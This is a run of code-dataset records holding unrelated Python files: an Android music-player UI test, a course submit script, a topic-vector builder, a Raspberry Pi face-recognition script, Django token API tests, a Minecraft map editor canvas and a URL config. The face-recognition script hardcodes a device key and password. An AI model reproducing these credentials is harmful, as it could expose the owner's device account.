self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n 
self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][3]#playlists--recentlyplayed list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][4]#playlists--recentlyadded list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][5]#playlists--mostplayed list\n self.touchButton(phone,page,button)\n page = self.page_dict['playlist_detail']\n button = button_list[phone][page][0]#playlist_detail--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlist_detail_menu']\n button = button_list[phone][page][i]#playlist_detail_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i !=0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][1]#playlists--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][6]#playlists--newlist\n self.touchButton(phone,page,button)\n self.touchConfirmCancel('confirm')\n time.sleep(2)\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n self.touchConfirmCancel('confirm')\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['playlists_menu']\n button = button_list[phone][page][i]#playlists_menu--sleepmode--settings\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['playlists']\n button = button_list[phone][page][0]#playlists--home\n self.touchButton(phone,page,button)\n elif p_type == 'online':#14\n ###online music page\n page = self.page_dict['musichome']\n button = 
button_list[phone][page][6]#musichome--online\n self.touchButton(phone,page,button)\n page = self.page_dict['online']\n button = button_list[phone][page][2]#online_album_detail--input\n self.touchButton(phone,page,button)\n self.inputText()\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_ENTER'])\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.dragPage('right')\n rnd = random.randint(0,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n page = self.page_dict['billboard']\n button = button_list[phone][page][0]#billboard--random_billboard\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.dragPage('right')\n rnd = random.randint(0,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n page = self.page_dict['fm']\n button = button_list[phone][page][0]#fm--random_fm\n self.touchButton(phone,page,button)\n time.sleep(10)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n self.dragPage('left')\n self.dragPage('left')\n page = self.page_dict['online']\n button = button_list[phone][page][6]#online_album_detail--hot_artists\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][4]#online--new_albums\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][5]#online_album_detail--more_artists\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_singers_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = button_list[phone][page][0]#online_more_singers_random--random_singers\n self.touchButton(phone,page,button)\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['online']\n button = button_list[phone][page][3]#online_album_detail--more_albums\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_albums_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = button_list[phone][page][0]#online_more_albums_random--random_albums\n self.touchButton(phone,page,button)\n page = self.page_dict['online_album_detail']\n button = button_list[phone][page][2]#online_album_detail--play_all\n self.touchButton(phone,page,button)\n self.dragPage('right')\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][3]#online_album_detail--download_single\n self.touchButton(phone,page,button)\n print('Begin to download and wait 20 sec')\n time.sleep(20)\n print('End downloading')\n button = button_list[phone][page][2]#online_album_detail--play_all\n self.longPress(phone,page,button)\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n button = self.edit_mode_button[phone]['bottom-4']['2']#delete\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n self.touchConfirmCancel('confirm')\n self.killPlayer()\n\nif __name__=='__main__':\n ms = PlayerTest()\n begin_time = time.time()\n for device_id in ms.device_list:\n if device_id != '':\n ms.connectToDevice(device_id)\n device = ms.device\n if not device:\n print('Fail to connect to device %s'% device_id)\n elif device == 'error: device not found':\n print('Fail to connect to device %s'% device_id)\n else:\n ms.deviceID 
= device_id\n ms.getPhoneType()\n hms = time.strftime('%H:%M:%S')\n print('##############Begin to get view points @ time:%s##############'% hms)\n #ms.getButtons()\n hms = time.strftime('%H:%M:%S')\n print('##############End get view points @ time:%s##############'% hms)\n #print(ms.button_pos[ms.phone])\n ms.unLock()\n ms.killPlayer()\n test_order_index = []\n test_order_page = []\n test_page_count = 24\n pages = [2,4,8,10,12,14,]\n for i in xrange(test_page_count):\n num_pages = len(pages)\n rnd = random.randint(0,num_pages-1)\n page = pages[rnd]\n page_name = ms.page_list[page]\n test_order_index.append(rnd)\n test_order_page.append(page_name)\n for i in xrange(test_page_count):\n print(test_order_page)\n print('#######pageTest#######%d'%i)\n rnd = test_order_index[i]\n page = pages[rnd]\n page_name = ms.page_list[page]\n ms.pageTest(page_name)\n ms.getLog()\n ms.lockPhone()\n print(ms.button_pos)\n end_time = time.time()\n time_cost_float = end_time - begin_time\n time_cost_int = int(time_cost_float)\n second = time_cost_int%60\n minute = (time_cost_int/60)%60\n hour = (time_cost_int/60/60)\n block = ':'\n time_cost = str(hour) + block + str(minute) + block + str(second)\n print('##############Cost time %s to get view points##############'% time_cost)","sub_path":"HM2_MusicPlayerSanityTest.py","file_name":"HM2_MusicPlayerSanityTest.py","file_ext":"py","file_size_in_byte":81410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}\n+{"seq_id":"443441251","text":"import argparse\n\nfrom nelson.gtomscs import submit\n\nLATE_POLICY = \"\"\"Late Assignments Policy:\n \\\"I have read the late assignments policy for CS6476. I understand that only my last\n commit before the deadline will be accepted.\\\"\n\"\"\"\n\nHONOR_PLEDGE = \"Honor Pledge:\\n\\n \\\"I have neither given nor received aid on this assignment.\\\"\\n\"\n\n\ndef require_pledges():\n print(LATE_POLICY)\n ans = raw_input(\"Please type 'yes' to agree and continue>\")\n if ans != \"yes\":\n raise RuntimeError(\"Late Assignments Policy not accepted.\")\n\n print\n print(HONOR_PLEDGE)\n ans = raw_input(\"Please type 'yes' to agree and continue>\")\n if ans != \"yes\":\n raise RuntimeError(\"Honor pledge not accepted\")\n print\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Submits code to the Udacity site.')\n parser.add_argument('part', choices=['ps01', 'ps01_report'])\n args = parser.parse_args()\n\n quiz = args.part\n course = \"cs6476\"\n\n if quiz == \"ps01\":\n filenames = [\"ps1.py\"]\n else:\n filenames = ['ps1_report.pdf', 'experiment.py', 'image1_.png', 'image1.png']\n\n require_pledges()\n\n submit(course, quiz, filenames)\n\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/ps01/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}\n+{"seq_id":"437659838","text":"\"\"\"\nSTEP-2\nRead the list of (username, topic) assignments and\nreturn a dict of username -> topic vector.\n\n\"\"\"\nimport argparse\nimport pickle\nimport pandas as pd\nimport logging\n\n# Input arguments\nPROGRAM_DESCRIPTION = \"Read the topic assignment file from the jLDADMM algorithm and create the topic vectors\"\nparser = argparse.ArgumentParser(description=PROGRAM_DESCRIPTION)\nparser.add_argument('filename', type=str, help='pickle file with the (userid, topic) assignments')\nparser.add_argument('topicdict', type=str, help='output pickle for the per-user topic vectors')\nparser.add_argument('logfile', type=str, help='path of the log file')\nargs = 
vars(parser.parse_args())\n\n\ndef main():\n user_topic_list = args['filename']\n topic_result = args['topicdict']\n log_file = args['logfile']\n topic_count = 20\n\n list_user = pickle.load(open(user_topic_list, 'rb'))\n\n # create log file\n # log_file = user_topic_list.rpartition('/')[0] + \"log.log\"\n logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s %(message)s')\n logging.debug(\"make topic vector for {0} \".format(user_topic_list))\n # print(list_user)\n df = pd.DataFrame(list_user)\n #print(df[:5])\n grouped_df = df.groupby(['userid'])\n\n # per-user topic vectors; renamed from 'dict' so the builtin is not shadowed\n topic_vectors = {}\n count = 0\n discarded_count = 0\n for key, item in grouped_df:\n count += 1\n #print (\"key: \" + key)\n gf = item.groupby('topic').size()\n topics = [str(x) for x in range(0, topic_count)]\n #print(topics)\n topic_Dict = gf.to_dict()\n topic_vec = []\n total = 0\n for one_topic in topics:\n if one_topic in topic_Dict:\n topic_vec.append(topic_Dict[one_topic])\n total += topic_Dict[one_topic]\n else:\n topic_vec.append(0)\n #print(topic_vec)\n if total == 0:\n discarded_count += 1\n #print(\"user: \", key , \" discarded\")\n continue\n if count % 1000 == 0:\n logging.info(\"users done : {} \".format(count))\n finallist = [float(x)/float(total) for x in topic_vec]\n\n # change list to dict\n list_dict = {}\n for idx, val in enumerate(finallist):\n if val > 0:\n list_dict[idx] = val\n\n topic_vectors[key] = list_dict\n logging.debug(\"discarded {}\".format(discarded_count))\n # pickle needs a binary-mode file handle\n pickle.dump(topic_vectors, open(topic_result, 'wb'))\n\n\nif __name__ == '__main__':\n main()","sub_path":"jDMM/make_topic_vector.py","file_name":"make_topic_vector.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}\n+{"seq_id":"15453195","text":"import numpy as np\nimport cv2\nimport time\nimport wolk\nimport face_recognition\nimport os\nfrom collections import deque\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nfrom text_reader import XFRReader\n\n# renamed the parameter from 'list' so the builtin is not shadowed\ndef sendToPlatform(names_list):\n if len(names_list) == 0:\n WD.add_sensor_reading(\"FR\", \"I don't see anyone!\")\n WD.publish()\n else:\n people = \"\"\n for person in names_list:\n people = people + person.rstrip() + \" \"\n WD.add_sensor_reading(\"FR\", people)\n WD.publish()\n\nprint(\"have opencl - \", cv2.ocl.haveOpenCL())\nif cv2.ocl.haveOpenCL():\n cv2.ocl.setUseOpenCL(True)\n print(\"use opencl - \", cv2.ocl.useOpenCL())\n\nsend_platform = True # if internet connection is down, you should turn it off\n # but doesn't really affect performance\n\nxfrreader = XFRReader()\nimages, names = xfrreader.readFiles()\n\n# gets all encodings\nencodings = list()\nfor image in images:\n loaded = face_recognition.load_image_file(image)\n encoding = face_recognition.face_encodings(loaded)[0]\n encodings.append(encoding)\n\nprint(\"running in \", 320, \"x\", 240)\nprint(\"fps \", 24)\n\ntime.sleep(1) \n\ncamera = PiCamera()\ncamera.resolution = (320, 240)\ncamera.framerate = 24 \nrawCapture = PiRGBArray(camera, size=camera.resolution)\n\nlastsent = deque()\nnow = deque()\n\nif send_platform:\n device = wolk.Device(\n key = \"5ot5t1hg5m2l7pnw\",\n password = \"94ba8dd1-8b18-420a-9e37-8eae2861cdf4\"\n )\n WD = wolk.WolkConnect(device)\n WD.connect()\n sendToPlatform(now)\n\ni = 0\n\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\"):\n if i < 2:\n img = 
frame.array\n processing = img[:,:, ::-1]\n if i == 1:\n face_locations = face_recognition.face_locations(processing)\n face_encodings = face_recognition.face_encodings(processing, face_locations)\n face_names = deque()\n faces = zip(face_locations, face_encodings)\n for location, encoding in faces:\n matches = face_recognition.compare_faces(encodings, encoding)\n name = \"unknown\"\n if True in matches:\n index = matches.index(True)\n name = names[index]\n else:\n encodings.append(encoding)\n name = xfrreader.randomString()\n names.append(name)\n cropped = img[location[0] - 20:location[2] + 20, location[3] - 20:location[1] + 20]\n if cv2.imwrite(name + '.jpg', cropped):\n xfrreader.writeFile(name, name + '.jpg')\n else:\n os.remove(name + '.jpg')\n face_names.append(name)\n\n if lastsent != face_names:\n lastsent = face_names\n sendToPlatform(face_names)\n\n rawCapture.truncate(0)\n i = i + 1\n if i == 3:\n i = 1\n\n# the camera object is a PiCamera, which is released with close()\ncamera.close()\nif send_platform:\n WD.disconnect()\n\n","sub_path":"pi/face-recognizer.py","file_name":"face-recognizer.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}\n+{"seq_id":"559481374","text":"from airone.lib.test import AironeViewTest\n\nfrom rest_framework.authtoken.models import Token\n\nfrom user.models import User\nfrom django.contrib.auth.models import User as DjangoUser\n\n\nclass APITest(AironeViewTest):\n def test_create_token(self):\n admin = self.admin_login()\n\n resp = self.client.put('/api/v1/user/access_token')\n self.assertEqual(resp.status_code, 200)\n self.assertTrue('results' in resp.json())\n self.assertTrue(isinstance(resp.json()['results'], str))\n self.assertEqual(resp.json()['results'], str(Token.objects.get(user=admin)))\n\n def test_refresh_token(self):\n admin = self.admin_login()\n token = Token.objects.create(user=admin)\n\n resp = self.client.put('/api/v1/user/access_token')\n self.assertEqual(resp.status_code, 200)\n self.assertNotEqual(resp.json()['results'], str(token))\n\n def test_get_token(self):\n admin = self.admin_login()\n token = Token.objects.create(user=admin)\n\n resp = self.client.get('/api/v1/user/access_token')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json()['results'], str(token))\n\n def test_refresh_token_using_token(self):\n # This does not log in; it only creates a User named 'guest'\n user = User.objects.create(username='guest')\n token = Token.objects.create(user=DjangoUser.objects.get(id=user.id))\n\n resp = self.client.get('/api/v1/user/access_token', **{\n 'HTTP_AUTHORIZATION': 'Token %s' % str(token),\n })\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json()['results'], str(token))\n","sub_path":"api_v1/tests/user/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}\n+{"seq_id":"103873321","text":"import wx\nfrom OpenGL.GL import *\nimport os\nfrom typing import TYPE_CHECKING, Optional, Any, Dict, Tuple, List, Generator, Union\nimport numpy\n\nimport minecraft_model_reader\nfrom amulet.api.chunk import Chunk\nfrom amulet.api.structure import Structure\nfrom amulet.api.errors import ChunkLoadError\nfrom amulet.api.data_types import PointCoordinatesNDArray\nfrom amulet.api.selection import SelectionGroup\n\nfrom amulet_map_editor.opengl.mesh.world_renderer.world import RenderWorld, cos, tan, atan\nfrom amulet_map_editor.opengl.mesh.selection import 
RenderSelection, RenderSelectionGroup\nfrom amulet_map_editor.opengl.mesh.structure import RenderStructure\nfrom amulet_map_editor.opengl import textureatlas\nfrom amulet_map_editor.opengl.canvas.base import BaseCanvas\nfrom amulet_map_editor import log\nfrom ..events import CameraMoveEvent\n\nif TYPE_CHECKING:\n    from amulet.api.world import World\n\nMODE_NORMAL = 0  # normal selection\nMODE_DISABLED = 1  # non-interactive selection boxes\nMODE_STRUCTURE = 2  # MODE_DISABLED and draw structure if exists\n\n\nclass EditCanvas(BaseCanvas):\n    def __init__(self, parent: wx.Window, world: 'World'):\n        super().__init__(parent)\n        self._last_mouse_x = 0\n        self._last_mouse_y = 0\n        self._mouse_delta_x = 0\n        self._mouse_delta_y = 0\n        self._mouse_lock = False\n        self._mouse_moved = False\n\n        # load the resource packs\n        os.makedirs('resource_packs', exist_ok=True)\n        if not os.path.isfile('resource_packs/readme.txt'):\n            with open('resource_packs/readme.txt', 'w') as f:\n                f.write('Put the Java resource pack you want loaded in here.')\n\n        self._texture_bounds: Optional[Dict[Any, Tuple[float, float, float, float]]] = None\n        self._resource_pack: Optional[minecraft_model_reader.JavaRPHandler] = None\n\n        # note: the listed pack names must be joined onto 'resource_packs',\n        # otherwise the isdir check and JavaRP load run against the working directory\n        self._load_resource_pack(\n            minecraft_model_reader.JavaRP(os.path.join(os.path.dirname(__file__), '..', 'amulet_resource_pack')),\n            minecraft_model_reader.java_vanilla_latest,\n            *[minecraft_model_reader.JavaRP(os.path.join('resource_packs', rp)) for rp in os.listdir('resource_packs') if os.path.isdir(os.path.join('resource_packs', rp))],\n            minecraft_model_reader.java_vanilla_fix\n        )\n\n        self._resource_pack_translator = world.world_wrapper.translation_manager.get_version('java', (1, 15, 2))\n\n        self._render_world = RenderWorld(\n            self.context_identifier,\n            world,\n            self._resource_pack,\n            self._gl_texture_atlas,\n            self._texture_bounds,\n            self._resource_pack_translator\n        )\n\n        self._camera: List[float] = [0.0, 100.0, 0.0, 45.0, 45.0]\n        self._projection = [70.0, 4 / 3, 0.1, 1000.0]\n        self._camera_move_speed = 2\n        self._camera_rotate_speed = 2\n        self._select_distance = 10\n        self._select_distance2 = 10\n        self._select_mode = MODE_NORMAL\n\n        self._selection_group = RenderSelectionGroup(\n            self.context_identifier,\n            self._texture_bounds,\n            self._gl_texture_atlas\n        )\n        self._structure: Optional[RenderStructure] = None\n        self._structure_locations: List[numpy.ndarray] = []\n\n        self._draw_timer = wx.Timer(self)\n        self.Bind(wx.EVT_TIMER, self._on_draw, self._draw_timer)\n\n        self._gc_timer = wx.Timer(self)\n        self.Bind(wx.EVT_TIMER, self._gc, self._gc_timer)\n\n        self._rebuild_timer = wx.Timer(self)\n        self.Bind(wx.EVT_TIMER, self._rebuild, self._rebuild_timer)\n\n    @property\n    def selection_group(self) -> SelectionGroup:\n        return self._selection_group.create_selection_group()\n\n    @property\n    def active_selection(self) -> Optional[RenderSelection]:\n        return self._selection_group.active_selection\n\n    def enable(self):\n        self.SetCurrent(self._context)\n        self._render_world.enable()\n        self._draw_timer.Start(33)\n        self._gc_timer.Start(10000)\n        self._rebuild_timer.Start(1000)\n\n    def disable(self):\n        self._draw_timer.Stop()\n        self._gc_timer.Stop()\n        self._rebuild_timer.Stop()\n        self._render_world.disable()\n\n    def disable_threads(self):\n        self._render_world.chunk_generator.stop()\n\n    def enable_threads(self):\n        self._render_world.chunk_generator.start()\n\n    def close(self):\n        self._render_world.close()\n        super()._close()\n\n    def is_closeable(self):\n        return self._render_world.is_closeable()\n\n    def _load_resource_pack(self, *resource_packs: minecraft_model_reader.JavaRP):\n        self._resource_pack = 
minecraft_model_reader.JavaRPHandler(resource_packs)\n        self._create_atlas()\n\n    def _create_atlas(self):\n        texture_atlas, self._texture_bounds, width, height = textureatlas.create_atlas(\n            self._resource_pack.textures\n        )\n        glBindTexture(GL_TEXTURE_2D, self._gl_texture_atlas)\n        glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width, height, 0, GL_RGBA, GL_UNSIGNED_BYTE, texture_atlas)\n        glBindTexture(GL_TEXTURE_2D, 0)\n        log.info('Finished setting up texture atlas in OpenGL')\n\n    @property\n    def structure(self) -> RenderStructure:\n        return self._structure\n\n    @structure.setter\n    def structure(self, structure: Structure):\n        self._structure = RenderStructure(\n            self.context_identifier,\n            structure,\n            self._resource_pack,\n            self._gl_texture_atlas,\n            self._texture_bounds,\n            self._resource_pack_translator\n        )\n\n    @property\n    def structure_locations(self) -> List[numpy.ndarray]:\n        return self._structure_locations\n\n    @property\n    def select_distance(self) -> int:\n        return self._select_distance\n\n    @select_distance.setter\n    def select_distance(self, distance: int):\n        self._select_distance = distance\n        self._change_box_location()\n\n    @property\n    def select_distance2(self) -> int:\n        return self._select_distance2\n\n    @select_distance2.setter\n    def select_distance2(self, distance: int):\n        self._select_distance2 = distance\n        self._change_box_location()\n\n    @property\n    def select_mode(self) -> int:\n        return self._select_mode\n\n    @select_mode.setter\n    def select_mode(self, select_mode: int):\n        self._select_mode = select_mode\n\n    @property\n    def dimension(self) -> str:\n        return self._render_world.dimension\n\n    @dimension.setter\n    def dimension(self, dimension: str):\n        self._render_world.dimension = dimension\n\n    @property\n    def camera_location(self) -> Tuple[float, float, float]:\n        return tuple(self._camera[:3])\n\n    @camera_location.setter\n    def camera_location(self, location: Tuple[Union[int, float], Union[int, float], Union[int, float]]):\n        self._camera[:3] = location\n        self._transformation_matrix = None\n        self._change_box_location()\n        wx.PostEvent(self, CameraMoveEvent(x=self._camera[0], y=self._camera[1], z=self._camera[2], rx=self._camera[3], ry=self._camera[4]))\n\n    @property\n    def camera_move_speed(self) -> float:\n        \"\"\"The speed that the camera moves at\"\"\"\n        return self._camera_move_speed\n\n    @camera_move_speed.setter\n    def camera_move_speed(self, val: float):\n        self._camera_move_speed = val\n\n    @property\n    def camera_rotate_speed(self) -> float:\n        \"\"\"The speed that the camera rotates at\"\"\"\n        return self._camera_rotate_speed\n\n    @camera_rotate_speed.setter\n    def camera_rotate_speed(self, val: float):\n        self._camera_rotate_speed = val\n\n    @property\n    def fov(self) -> float:\n        return self._projection[0]\n\n    @fov.setter\n    def fov(self, fov: float):\n        self._projection[0] = fov\n        self._transformation_matrix = None\n\n    @property\n    def aspect_ratio(self) -> float:\n        return self._projection[1]\n\n    @aspect_ratio.setter\n    def aspect_ratio(self, aspect_ratio: float):\n        self._projection[1] = aspect_ratio\n        self._transformation_matrix = None\n\n    def _change_box_location(self):\n        if self._selection_group.active_selection and self._selection_group.active_selection.being_resized:\n            position, box_index = self._box_location_distance(self.select_distance2)\n        elif self._mouse_lock:\n            position, box_index = self._box_location_distance(self.select_distance)\n        else:\n            position, box_index = self._box_location_closest()\n\n        self._selection_group.update_position(position, box_index)\n
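\n        # Cursor placement, as implemented above: while a box is being resized the\n        # point is projected select_distance2 along the look vector, in mouse-lock it\n        # is projected select_distance, and otherwise it snaps to the closest hit.\n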
\n        # if self._selection_box.select_state == 0:\n        #     (x, y, z) = self._selection_box.point1 = self._selection_box.point2 = location\n        #     wx.PostEvent(self, BoxGreenCornerChangeEvent(x=x, y=y, z=z))\n        #     wx.PostEvent(self, BoxBlueCornerChangeEvent(x=x, y=y, z=z))\n        # elif self._selection_box.select_state == 1:\n        #     (x, y, z) = self._selection_box.point2 = location\n        #     wx.PostEvent(self, BoxBlueCornerChangeEvent(x=x, y=y, z=z))\n        # elif self._selection_box.select_state == 2:\n        #     self._selection_box2.point1 = self._selection_box2.point2 = location\n\n    def ray_collision(self):\n        vector_start = self.camera_location\n        direction_vector = self._look_vector()\n        min_point = self.active_selection.min\n        max_point = self.active_selection.max\n\n        point_array = max_point.copy()\n        numpy.putmask(point_array, direction_vector > 0, min_point)\n\n        t = (point_array - vector_start) / direction_vector\n\n        t_max = numpy.where(t == t.max())[0][0]\n        return t_max\n\n    def _box_location_closest(self) -> Tuple[PointCoordinatesNDArray, Optional[int]]:\n        \"\"\"Find the location of the closest non-air block or selection box\"\"\"\n        cx: Optional[int] = None\n        cz: Optional[int] = None\n        chunk: Optional[Chunk] = None\n\n        box_index, nearest_selection_box = self._selection_group.closest_intersection(self.camera_location, self._look_vector())\n\n        location = numpy.array([0, 0, 0], dtype=numpy.int32)\n        for location in self._collision_locations():\n            if nearest_selection_box and nearest_selection_box.in_boundary(location):\n                return location, box_index\n\n            x, y, z = location\n            cx_ = x >> 4\n            cz_ = z >> 4\n            if cx is None or cx != cx_ or cz != cz_:\n                cx = cx_\n                cz = cz_\n                try:\n                    chunk = self._render_world.world.get_chunk(cx, cz, self.dimension)\n                except ChunkLoadError:\n                    chunk = None\n\n            if chunk is not None and self._render_world.world.palette[chunk.blocks[x % 16, y, z % 16]].namespaced_name != 'universal_minecraft:air':\n                return location, None\n        return location, None\n\n    def _box_location_distance(self, distance: int) -> Tuple[PointCoordinatesNDArray, Optional[int]]:\n        \"\"\"\n        The first block location along the camera's look vector that is further away than `distance`.\n        :param distance: The distance between the block and the camera.\n        :return: (x, y, z) numpy array, selection box index\n        \"\"\"\n        look_vector = self._look_vector()\n        position = numpy.array(self.camera_location, dtype=numpy.int) + numpy.floor(look_vector*distance).astype(numpy.int)\n        box = next((index for index, box in enumerate(self._selection_group) if box.in_boundary(position)), None)\n        return position, box\n\n    def _look_vector(self) -> numpy.ndarray:\n        \"\"\"\n        The x,y,z vector for the direction the camera is facing\n        :return: (x, y, z) numpy float array ranging from -1 to 1\n        \"\"\"\n        look_vector = numpy.array([0, 0, -1, 0])\n        if not self._mouse_lock:\n            screen_x, screen_y = numpy.array(self.GetSize(), numpy.int) / 2\n            screen_dx = atan(self.aspect_ratio * tan(self.fov / 2) * self._mouse_delta_x / screen_x)\n            screen_dy = atan(cos(screen_dx) * tan(self.fov / 2) * self._mouse_delta_y / screen_y)\n            look_vector = numpy.matmul(self.rotation_matrix(screen_dy, screen_dx), look_vector)\n        look_vector = numpy.matmul(self.rotation_matrix(*self._camera[3:5]), look_vector)[:3]\n        look_vector[abs(look_vector) < 0.000001] = 0.000001\n        return look_vector\n\n    def _collision_locations(self, max_distance=100) -> Generator[numpy.ndarray, None, None]:\n        \"\"\"\n        The block locations that the camera's look vector passes through.\n        :param max_distance: The maximum distance along the look vector to 
traverse.\n        :return: A generator of (x, y, z) numpy arrays\n        \"\"\"\n        # TODO: optimise this\n\n        look_vector = self._look_vector()\n        dx, dy, dz = look_vector\n\n        vectors = numpy.array(\n            [\n                look_vector / abs(dx),\n                look_vector / abs(dy),\n                look_vector / abs(dz)\n            ]\n        )\n        offsets = -numpy.eye(3)\n\n        locations = set()\n        start: numpy.ndarray = numpy.array(self.camera_location, numpy.float32) % 1\n\n        for axis in range(3):\n            location: numpy.ndarray = start.copy()\n            vector = vectors[axis]\n            offset = offsets[axis]\n            if vector[axis] > 0:\n                location = location + vector * (1 - location[axis])\n            else:\n                location = location + vector * location[axis]\n            while numpy.all(abs(location) < max_distance):\n                locations.add(tuple(numpy.floor(location).astype(numpy.int)))\n                locations.add(tuple(numpy.floor(location + offset).astype(numpy.int)))\n                location += vector\n        if locations:\n            collision_locations = numpy.array(\n                sorted(list(locations), key=lambda loc: sum(abs(loc_) for loc_ in loc))\n            ) + numpy.floor(self.camera_location).astype(numpy.int)\n        else:\n            collision_locations = start.astype(numpy.int)\n\n        for location in collision_locations:\n            yield location\n\n    def set_size(self, width, height):\n        glViewport(0, 0, width, height)\n        if height > 0:\n            self.aspect_ratio = width / height\n        else:\n            self.aspect_ratio = 1\n        self.DoSetSize(0, 0, width, height, 0)  # I don't know if this is how you are supposed to do this\n\n    def _on_draw(self, event):\n        self.draw()\n        event.Skip()\n\n    def draw(self):\n        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n        self._render_world.draw(self.transformation_matrix)\n        if self._select_mode == MODE_STRUCTURE and self._structure is not None:\n            transform = numpy.eye(4, dtype=numpy.float32)\n            for location in self.structure_locations:\n                transform[3, 0:3] = location\n                self._structure.draw(numpy.matmul(transform, self.transformation_matrix), 0, 0)\n        self._selection_group.draw(self.transformation_matrix, self._select_mode == MODE_NORMAL, tuple(self.camera_location))\n        self.SwapBuffers()\n\n    def _gc(self, event):\n        self._render_world.run_garbage_collector()\n        event.Skip()\n\n    def _rebuild(self, evt):\n        self._render_world.chunk_manager.rebuild()\n        evt.Skip()\n","sub_path":"amulet_map_editor/programs/edit/canvas/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":15208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462072004","text":"from django.conf.urls import patterns, url\n\nurlpatterns = patterns('timeline.views',\n    url(r'^$', 'index', name='index'),\n    url(r'^user/(?P<user_id>\\d+)/$', 'user_timeline', name='user_timeline'),\n    url(r'^new/$', 'new', name='new'),\n    url(r'^post/(?P<post_id>\\d+)/$', 'post_detail', name='post_detail'),\n    url(r'^post/(?P<post_id>\\d+)/like/$', 'post_like', name='post_like'),\n    url(r'^post/(?P<post_id>\\d+)/unlike/$', 'post_unlike', 